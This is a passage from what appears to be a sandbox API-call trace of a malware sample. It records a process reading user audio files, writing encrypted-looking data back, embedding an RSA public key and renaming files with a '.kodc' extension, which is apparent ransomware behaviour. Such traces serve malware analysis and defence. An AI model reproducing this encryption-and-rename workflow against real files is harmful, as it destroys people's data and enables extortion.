hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb81a8 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81a8 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb63e8 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x16ef, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x16ef, lpOverlapped=0x0) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0101.800] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.800] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.800] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.800] CloseHandle (hObject=0x5cc) returned 1 [0101.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.802] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\LdKdxLYR8KiGRAR71qNv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\ldkdxlyr8kigrar71qnv.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\LdKdxLYR8KiGRAR71qNv.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\ldkdxlyr8kigrar71qnv.wav.kodc")) returned 1 [0101.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.802] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.804] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc25f60, ftCreationTime.dwHighDateTime=0x1d5c3ca, ftLastAccessTime.dwLowDateTime=0x5545d450, ftLastAccessTime.dwHighDateTime=0x1d5bdce, ftLastWriteTime.dwLowDateTime=0x5545d450, ftLastWriteTime.dwHighDateTime=0x1d5bdce, nFileSizeHigh=0x0, nFileSizeLow=0x1826, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rs3sb2G 3uKXzeiC9.wav", cAlternateFileName="RS3SB2~1.WAV")) returned 1 [0101.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.804] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\rs3sb2G 3uKXzeiC9.wav") returned=".wav" [0101.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\rs3sb2G 3uKXzeiC9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\rs3sb2g 3ukxzeic9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.804] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=6182) returned 1 [0101.804] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.807] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.807] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.808] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.808] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1826, lpOverlapped=0x0) returned 1 [0101.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.808] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.809] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.809] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.809] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.809] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.809] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.809] GetLastError () returned 0x0 [0101.809] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.809] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.809] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.810] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.810] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1830) returned 0x9ba8d90 [0101.810] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb63e8 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6430 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8190 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81a8 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.810] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81a8 | out: hHeap=0x630000) returned 1 [0101.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb81a8 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8190 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81a8 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.811] GetCurrentThreadId () returned 0x42c [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8938 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.812] GetCurrentThreadId () returned 0x42c [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8190 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) 